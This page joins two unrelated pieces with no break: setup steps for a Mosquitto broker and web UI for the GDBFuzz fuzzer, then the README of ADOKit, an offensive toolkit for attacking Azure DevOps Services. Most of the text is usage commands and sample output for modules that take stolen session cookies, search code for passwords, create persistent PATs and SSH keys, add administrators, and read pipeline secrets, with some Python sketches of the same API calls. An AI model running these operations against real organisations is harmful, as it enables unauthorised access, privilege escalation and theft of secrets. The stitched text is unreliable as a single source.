Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:
listener 1883
allow_anonymous true
listener 9001
protocol websockets
Restart the mosquitto broker:
sudo service mosquitto restart
Check that the mosquitto broker is running:
sudo service mosquitto status
The output should include the text 'Active: active (running)'
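You can also verify the plain TCP listener programmatically; a minimal sketch using the paho-mqtt client (an extra dependency, not part of the web UI setup):

```python
import paho.mqtt.client as mqtt

# paho-mqtt 1.x constructor; paho-mqtt >= 2.0 additionally expects
# mqtt.Client(mqtt.CallbackAPIVersion.VERSION1) as the first argument.
client = mqtt.Client()
client.connect("localhost", 1883, keepalive=60)  # TCP listener from the config
client.publish("gdbfuzz/healthcheck", "ping")    # throwaway topic (assumption)
client.disconnect()
print("mosquitto reachable on :1883")
```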
Start the web UI:
cd ./src/webui
npm start
Your web browser should open automatically on 'http://localhost:3000/'.
Start GDBFuzz with a user config file where enable_UI is set to True. You can use the Docker container and the arduinojson SUT from above; just make sure enable_UI is set to True in the config.
Covered nodes are shown in blue; uncovered nodes are shown in white. We only show uncovered nodes whose parent is covered (drawing the complete control flow graph takes too much time when the graph is large).
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
API key: provide an Azure DevOps personal access token via /credential:apiToken
Stolen cookie: provide the UserAuthentication cookie from a user's machine for the .dev.azure.com domain via /credential:UserAuthentication=ABC123
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | getpipelinevars | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getpipelinesecrets | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Performs an authentication check to ensure that the organization is using Azure DevOps and that the provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
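Under the hood, a check like this is just one authenticated request against the REST API that ADOKit wraps. A rough Python equivalent using a PAT (illustrative only; this is not ADOKit's internal code):

```python
import requests

ORG_URL = "https://dev.azure.com/YourOrganization"  # target organization
PAT = "apiKeyGoesHere"                              # personal access token

# Azure DevOps accepts a PAT via HTTP Basic auth with an empty username.
resp = requests.get(f"{ORG_URL}/_apis/projects?api-version=7.0",
                    auth=("", PAT), timeout=10)

if resp.status_code == 200:
    print("[+] SUCCESS: Credentials provided are VALID.")
else:
    # Azure DevOps often answers 203 with a sign-in page (rather than 401)
    # when the PAT is invalid.
    print(f"[-] Credentials rejected (HTTP {resp.status_code})")
```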
Get the current user and the user's group memberships
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of their group memberships.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
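The identity resolution shown above can be reproduced with one call to the connectionData endpoint; note this endpoint is only semi-documented, so treat the sketch as an approximation of what a whoami-style lookup does, not as ADOKit's implementation:

```python
import requests

ORG_URL = "https://dev.azure.com/YourOrganization"
PAT = "apiKeyGoesHere"

# connectionData returns the identity Azure DevOps resolved for the
# supplied credentials (a semi-documented but widely used endpoint).
resp = requests.get(f"{ORG_URL}/_apis/connectionData",
                    auth=("", PAT), timeout=10)
resp.raise_for_status()

user = resp.json()["authenticatedUser"]
print(user["providerDisplayName"])  # display name of the authenticated user
```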
Discover repositories being used in an Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
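The listing above corresponds to the Git repositories endpoint of the REST API; a minimal PAT-based sketch of the same enumeration (again illustrative, not ADOKit's code):

```python
import requests

ORG_URL = "https://dev.azure.com/YourOrganization"
PAT = "apiKeyGoesHere"

# Enumerate every Git repository the credential can see in the organization.
resp = requests.get(f"{ORG_URL}/_apis/git/repositories?api-version=7.0",
                    auth=("", PAT), timeout=10)
resp.raise_for_status()

for repo in resp.json()["value"]:
    print(f"{repo['name']} | {repo['webUrl']}")
```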
Search for repositories by repository name in an Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in an Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in an Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in an Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchcode
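Code search is served from almsearch.dev.azure.com rather than dev.azure.com; a hedged sketch based on the public Search API (endpoint and payload are from Microsoft's docs, not from ADOKit):

```python
import requests

ORG = "YourOrganization"
PAT = "apiKeyGoesHere"

# The code search API takes a POST with the search text in the body.
url = (f"https://almsearch.dev.azure.com/{ORG}"
       "/_apis/search/codesearchresults?api-version=7.0")
body = {"searchText": "password", "$top": 25}

resp = requests.post(url, json=body, auth=("", PAT), timeout=10)
resp.raise_for_status()

for hit in resp.json()["results"]:
    print(f"{hit['repository']['name']} :: {hit['path']}")
```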
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, valid-until date, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PATs) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and valid-until date for all active PATs for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PATs for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, valid-until date, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and valid-until date for all active SSH keys for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether the SSH key was removed or not, and then will list the current active SSH keys for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
----------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in an Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
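Group enumeration maps onto the Graph API, which is hosted on vssps.dev.azure.com and still versioned as a preview; a sketch (illustrative, not ADOKit's code):

```python
import requests

ORG = "YourOrganization"
PAT = "apiKeyGoesHere"

# The Graph API (users, groups, memberships) lives on vssps.dev.azure.com.
url = (f"https://vssps.dev.azure.com/{ORG}"
       "/_apis/graph/groups?api-version=7.0-preview.1")

resp = requests.get(url, auth=("", PAT), timeout=10)
resp.raise_for_status()

for group in resp.json()["value"]:
    print(f"{group['principalName']} | {group['displayName']}")
```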
Search for given group(s) in an Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
